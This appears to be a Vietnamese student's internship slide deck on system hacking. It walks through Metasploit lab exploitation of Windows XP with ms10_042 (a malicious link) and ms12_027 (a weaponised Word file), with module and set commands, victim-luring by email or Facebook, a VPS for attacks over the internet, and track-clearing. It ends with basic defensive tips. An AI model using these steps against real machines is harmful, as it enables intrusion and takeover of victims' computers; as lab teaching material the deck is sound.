Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc | PPT

  • 1. BÁO CÁO THỰC TẬP
    SYSTEM HACKING
    GVHD: Thầy Võ Đỗ Thắng
    SVTT: Trần Nguyễn Lộc
  • 2. MỤC LỤC
    Giới thiệu1
    2
    T
    3
    Tổng Kết
    Thực hiện
  • 3. Giới thiệu
    • Theo
    thống kê của công ty Bkav, từ đầu năm 2013
    đến nay, tại Việt Nam đã có 2.405 website của các
    cơ quan, doanh nghiệp bị xâm nhập, trung bình
    mỗi tháng có khoảng 300 website bị tấn công
    • Hiện nay, các thiết bị như máy tính PC, laptop,
    đều có kết nối mạng nội bộ hoặc kết nối Internet .
    Trên các thiết bị này, hầu hết cài đặt các phần
    mềm ứng dụng như IE, Microsoft Office, Adobe
    Reader ,…. và chạy hệ điều hành như Windows
    XP, Windows 7…
  • 4. Giới thiệu system hacking
    Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra
    những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ
    chức
    Gồm những kỹ thuật lấy username, password dựa vào phần
    mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều
    hành Windows
    Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông
    tin, xóa những log file hệ thống
  • 5. Quá trình tấn công vào một hệ thống
    Enumerate (liệt kê): Trích ra tất cả những thông tin có
    thể về user trong hệ thống. Sử dụng phương pháp thăm
    dò SNMP để có được những thông tin hữu ích, chính
    xác hơn
    Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất.
    Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng
    nhập của user. Hoặc bằng một cách nào khác, mục tiêu
    phải đạt tới là quyền truy cập vào hệ thống
    Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi
    giới hạn truy cập từ user binh thường lên admin hoặc
    user có quyền cao hơn đủ cho chúng ta tấn công
    Execute (thực thi): Thực thi ứng dụng trên hệ thống
    máy đích. Chuẩn bị trước malware, keylogger,
    rootkit…để chạy nó trên máy tính tấn côngHide (ẩn file): Những file thực thi, file soucecode chạy
    chương trình… Cần phải được làm ẩn đi, tránh bị mục
    tiêu phát hiện tiêu diệtTracks (dấu vết): Tất nhiên không phải là để lại dấu
    vết. Những thông tin có liên quan đến bạn cần phải bị
    xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
    năng bạn bị phát hiện là kẻ đột nhập là rất cao.
    Tóm lại, quá trình tấn công hệ
    thống (System hacking) là
    bước tiếp theo sau quá trình
    khảo sát, thu thập thông tin
    của mục tiêu cần tấn công
    bằng những kỹ thuật như
    Footprinting, Social
    engineering, Enumeration,
    Google Hacking… đã được áp
    dụng cho mục đích truy tìm
    thông tin.
  • 6. Hệ điều hành Backtrack 5 R3
    – Backtrack là một bản phân phối dạng Live DVD của
    Linux, được phát triển để thử nghiệm xâm nhập.
    Backtrack là sự hợp nhất giữa 3 bản phân phối khác
    nhau của Linux về thâm nhập thử nghiệm IWHAX,
    WHOPPIX, và Auditor. Trong phiên bản hiện tại của
    nó (5), Backtrack được dựa trên phiên bản phân phối
    Linux Ubuntu 11.10.
    – Backtrack 5 chứa một số công cụ có thể được sử dụng
    trong quá trình thử nghiệm thâm nhập của chúng ta
  • 7. Phần mềm Metasploit
    Metasploit là một dự án bảo mật máy tính cung cấp
    các thông tin về vấn đề lỗ hổng bảo mật cũng như
    giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
    phát hiện tấn công mạng.
    • Metasploit có thể chạy trên hầu hết các hệ điều hành:
    Linux, Windows, MacOS.
  • 8. Sơ đồ tổng quan hệ thống mạng LAN
    Trong một mạng LAN nội bộ,
    các máy tính thường kết nối với
    nhau với khoảng cách vật lý
    gần như trong một phòng, một
    tầng, một tòa nhà, công ty, …
    Các máy tính trong mạng LAN
    có thể chia sẻ tài nguyên với
    nhau, mà điển hình là chia sẻ
    tập tin, máy in, máy quét và
    một số thiết bị khác
     .Tấn công mạng Lan
  • 9. CHUẨN BỊ
     1
    máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn
    công).
     1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn
    công).
  • 10. Xâm nhập và khai thác
    Windows XP
    • Nhận dạng
    Lỗ hổng này có thể cho phép thực thi mã từ xa
    nếu người dùng xem một trang web thiết kế đặc
    biệt bằng cách sử dụng một trình duyệt web hoặc
    nhấp vào một liên kết thiết kế đặc biệt trong một
    thông báo e-mail.
    Khai thác lổ hổng Ms10-042
  • 11. • Thực hiện
    Xâm
    nhập và khai thác
    Windows XP
    Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
    Từ dấu nhắc sử dụng lệnh: msf > search ms10_042
    Copy đường dẫn, enter gõ use “dán đường dẫn vào”
    Gõ show options để thấy các options của lệnh.
    msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
  • 12.  Dùng lệnh set srvhost, lhost, exploit
    – Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
    – Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
    – Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.
  • 13.  Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà
    khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5
    sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích
    vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua
    facebook …., tùy vào khả năng của mỗi người)
  • 14.  Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy
    nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file,
    thư mục ….. trên máy nạn nhân.
  • 15.  Xem thông tin trên máy nạn nhân
     Tạo thư mục backdoor thành công.
  • 16. Xâm nhập và khai thác
    Windows XP
    a) Mô tả:
    Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của
    Microsoft office (word ) trên window.
    Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền
    sử dụng giống như người dùng đăng nhập vào máy tính.
    Khai thác lổ hỗng ms12-027
  • 17.  Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.
     Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027
     Tiến hành khai thác mã lỗi bằng dòng lệnh :
    use exploit /windows/fileformat/ms12_027_mscomctl_bof.
     Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027
    b) Các bước tấn công
  • 18.  Tiến hành set filename và set lhost
    -Lệnh set filename : tạo ra file word có chứa mã độc
    -Lệnh set lhost : set địa chỉ IP của máy backtrack 5.
  • 19.  Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file
    word này lên máy tính nạn nhân bằng nhiều cách như email……Khi
    nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn
    quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được
    tạo ra.
  • 20. -Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển.
    -Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.
  • 21.  Khai thác lỗ hỗng window qua mạng
    internet
    a) Giới thiệu Honeypot
     Honeypot là một hệ thống tài nguyên thông tin được xây dựng với
    mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không
    hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp
    xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là
    Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
    Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực
    tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc
    như hình thức tấn công, công cụ tấn công hay cách thức tiến hành
    thay vì bị tấn công.
  • 22. b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa
    qua Internet
  • 23.  Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
    – VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
    http://metasploit.org) đóng vai trò là một Honeypot trên mạng.
  • 24. c) Thực hiện khai thác mã lỗi
     Khi thác lỗi ms10_042 trong windows xp
    -Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center
    của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển
    trên máy nạn nhân.
    -Các bước tiến hành như sau:
    • Khởi động chương trình metasploit trên máy chủ vps .
  • 26. • Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác
    hay không: Ở đây search 10_042
  • 27.  Dùng lệnh set srvhost ,lhost , exploit
     Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps.
     Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps.
     Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc
    sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và
    ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân.
  • 28. • Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân
    Xem thông tin trên máy nạn nhân
  • 29. Tạo thư mục có tên là thư mục mới
  • 30. TỔNG KẾT
    • Mật
    khẩu phải được đặt nhiều hơn 8 ký tự và
    phải là tổng hợp giữa chữ hoa, chữ thường, số
    và ký tự đặc biệt để các chương trình khó dò ra
    • Không mở tập tin đính kèm thư điện tử có
    nguồn gốc không rõ ràng hoặc không tin cậy
    • Chắc chắn rằng bạn có và đã bật hệ thống
    tường lửa cho hệ thống của mình.

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *